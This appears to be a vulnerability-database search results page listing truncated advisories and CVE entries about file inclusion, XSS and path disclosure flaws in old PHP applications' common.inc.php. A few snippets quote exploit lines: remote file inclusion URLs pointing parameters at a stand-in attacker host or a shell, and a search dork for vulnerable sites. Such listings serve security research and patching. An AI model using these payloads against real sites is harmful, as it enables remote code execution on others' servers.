Lucene search

60 matches found

0day.today
added 2008/04/19 12:0 a.m., 27 views

Aterr 0.9.1 (class) Local File Inclusion Vulnerabilities (php5)

Exploit for unknown platform in category web applications. Aterr 0.9.1 class Local File Inclusion Vulnerabilities php5. Atter 0.9.1 Local File Inclusion Vulnerability Auth...

7.1 AI score
Exploits 0
Exploit DB
added 2008/04/19 12:0 a.m., 34 views

Aterr 0.9.1 - PHP5 Local File Inclusion

Atter 0.9.1 Local File Inclusion Vulnerability Author : KnocKout ThanX : CW ALL USERS Script Download : http://cms-bg.org/modules/mydownloads/viewcat.php?cid=5 Attackz : http://localsite.com/path/include/functions.inc.php?class=Local File...

7.4 AI score
Exploits 0
seebug.org
added 2008/01/01 12:0 a.m., 22 views

Discuz! "$_SERVER['PHP_SELF']" XSS Vulnerability

At line 69 of common.inc.php: $PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; $SCRIPT_FILENAME = str_replace('\\', '/', isset($_SERVER['PATH_TRANSLATED']) ? $_SERVER['PATH_TRANSLATED'] : $_SERVER['SCRIPT_FILENAME']); $boardurl = 'http://'.$_SERVER['HTTP_HOST'].preg_replace("//+api|archiver|wap?/$/i",...

7.1 AI score
Exploits 0
Prion
added 2007/10/19 11:17 p.m., 20 views

Cross site scripting

Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in (1) PHP_SELF in (a) server_status.php, and (b) grab_globals.lib.php, (c) display_change_password.lib.php, and (d) common.lib.php in...

4.3 CVSS, 5.7 AI score, 0.11824 EPSS
Exploits 0, References 17, Affected Software 1
NVD
added 2007/10/19 11:17 p.m., 20 views

CVE-2007-5589

Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in (1) PHP_SELF in (a) server_status.php, and (b) grab_globals.lib.php, (c) display_change_password.lib.php, and (d) common.lib.php in...

4.3 CVSS, 5.6 AI score, 0.11824 EPSS
Exploits 0, References 17
Cvelist
added 2007/10/19 11:0 p.m., 33 views

CVE-2007-5589

Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.11.1.2 allow remote attackers to inject arbitrary web script or HTML via certain input available in (1) PHP_SELF in (a) server_status.php, and (b) grab_globals.lib.php, (c) display_change_password.lib.php, and (d) common.lib.php in...

5.5 AI score, 0.11824 EPSS
Exploits 0, References 17
NVD
added 2007/08/09 9:17 p.m., 24 views

CVE-2007-4290

Multiple PHP remote file inclusion vulnerabilities in Guestbook Script 1.9 allow remote attackers to execute arbitrary PHP code via a URL in the scriptroot parameter to (1) delete.php, (2) edit.php, or (3) inc/common.inc.php; or (4) database.php, (5) entries.php, (6) index.php, (7) logout.php, or (8) settings.ph...

9.8 CVSS, 7.6 AI score, 0.00999 EPSS
Exploits 0, References 4
securityvulns
added 2007/08/08 12:0 a.m., 33 views

Guestbook Script 1.9 RFI

Guestbook Script 1.9 Remote File Include Dork:"Guestbook Script 1.9" Vuln Code: /admin/database.php /admin/entries.php /admin/index.php /admin/logout.php /admin/settings.php /delete.php /edit.php /inc/common.inc.php Exploit: www.server.com/path/file.php?scriptroot=Sh3ll =====================...

1.7 AI score
Exploits 0
exploitpack
added 2007/02/01 12:0 a.m., 20 views

Epistemon 1.0 - common.php?inc_path Remote File Inclusion

Epistemon 1.0 - common.php?inc_path Remote File Inclusion. Epistemon 1.0 = Remote File Include Vulnerability. Discover...

0.1 AI score
Exploits 0
myhack58
added 2007/01/24 12:0 a.m., 31 views

Discuz forum physical path disclosure principle - vulnerability warning - the black bar safety net

Affected version Discuz! 5.2 Discuz! 5.1 Discuz! 4.1 Discuz! 4.0 ............. 1. common.inc.php problem code, line 207 ..... $navtitle = $navigation = ''; $extra = isset($extra) && preg_match("/^+$/i", $extra) ? $extra : ''; $tpp = intval(empty($DSESSION) ? $topicperpage : $DSESSION); $ppp =...

0.3 AI score
Exploits 0
seebug.org
added 2007/01/01 12:0 a.m., 38 views

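Discuz Forum Physical Path Disclosure

When a variable is submitted as an array, if no such array exists but the variable does, the preg_match regular expression that follows cannot match, and the absolute path is leaked. Discuz!5.2 Discuz!5.1 Discuz!4.1 Discuz!4.0 http://www.discuz.net/ Open common.inc.php in the forum's include directory and change $extra = isset($extra) && preg_match to $extra = isset($extra) && @preg_match. 1. common.inc.php problem code, line 207 ..... $navtitle = $navigation = '';...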

7.1 AI score
Exploits 0
NVD
added 2006/12/23 1:28 a.m., 11 views

CVE-2006-6710

Multiple PHP remote file inclusion vulnerabilities in PgmReloaded 0.8.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) lang parameter to (a) index.php, the (2) CFGlibdir and (3) CFGlocaledir parameters to (b) common.inc.php, and the CFGlocalelangdir parameter to (c)...

7.5 CVSS, 7.7 AI score, 0.02826 EPSS
Exploits 1, References 4
seebug.org
added 2006/11/28 12:0 a.m., 17 views

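A-Conman Common.Inc.PHP Remote File Inclusion Vulnerability

A-Conman is a PHP-based web application. A-Conman does not properly filter user-submitted URI data, so a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'Common.Inc.PHP' script does not filter the user-submitted 'cm_basedir' parameter; submitting a malicious remote server as the include target can lead to execution of arbitrary PHP code with the privileges of the web process. a-ConMan a-ConMan 3.2b No solution is currently available: http://www.a-conman.com/...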

7.1 AI score
Exploits 0
CVE
added 2006/11/24 5:0 p.m., 57 views

CVE-2006-6078

CVE-2006-6078 : PHP remote file inclusion in the a-ConMan 3.2 beta package. The vulnerability is in common.inc.php, allowing remote attackers to execute arbitrary PHP code by supplying a URL in the cm_basedir parameter. Documented impact is arbitrary code execution via crafted input; exploitation...

7.5 CVSS, 7.9 AI score, 0.13614 EPSS
Exploits 1, References 7, Affected Software 1
Cvelist
added 2006/11/24 5:0 p.m., 19 views

CVE-2006-6078

PHP remote file inclusion vulnerability in common.inc.php in a-ConMan 3.2 beta allows remote attackers to execute arbitrary PHP code via a URL in the cm_basedir parameter...

7.5 AI score, 0.13614 EPSS
Exploits 1, References 7
seebug.org
added 2006/11/23 12:0 a.m., 29 views

a-ConMan <= 3.2b (common.inc.php) Remote File Inclusion Vulnerability

No description provided by source. ECHOADV61$2006 a-ConMan = v3.2beta Remote File Inclusion...

7.1 AI score
Exploits 0
exploitpack
added 2006/11/22 12:0 a.m., 27 views

a-ConMan 3.2b - common.inc.php Remote File Inclusion

a-ConMan 3.2b - common.inc.php Remote File Inclusion. ECHOADV61$2006 a-ConMan = v3.2beta Remote File Inclusion...

7.5 AI score
Exploits 0
Cvelist
added 2006/08/30 1:0 a.m., 16 views

CVE-2006-4448

Multiple PHP remote file inclusion vulnerabilities in interact 2.2, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) CONFIGBASEPATH parameter in (a) admin/autoprompter.php and (b) includes/common.inc.php, and the (2) CONFIGLANGUAGECPATH parameter ...

7.5 AI score, 0.06242 EPSS
Exploits 1, References 5
securityvulns
added 2006/08/10 12:0 a.m., 26 views

PgMarket 2.2.3 (CFG[libdir]) Remote File Inclusion Vulnerabilities

C Y B E R - W A R R i O R T I M PgMarket 2.2.3 CFG[libdir] Remote File Inclusion Vulnerabilities Author: xoron Class : Remote cont@ct: x0r0nathotmaildotcom Code: include $CFG["libdir"] . "stdlib.inc.php"; Exploit: http://www.site.com/path/common.inc.php?CFG[libdir]=http://evilscripts? Greetz: str0ke,...

0.8 AI score
Exploits 0
CVE
added 2001/02/02 5:0 a.m., 28 views

CVE-2001-0088

The CVE-2001-0088 entry concerns phpWebLog 0.4.2 where the common.inc.php initialization fails to set the $CONF array correctly, causing the password to be reduced to a single character. This weakens the SiteKey and enables remote attackers to potentially gain administrative privileges. Documenta...

7.5 CVSS, 7.4 AI score, 0.01015 EPSS
Exploits 1, References 3, Affected Software 1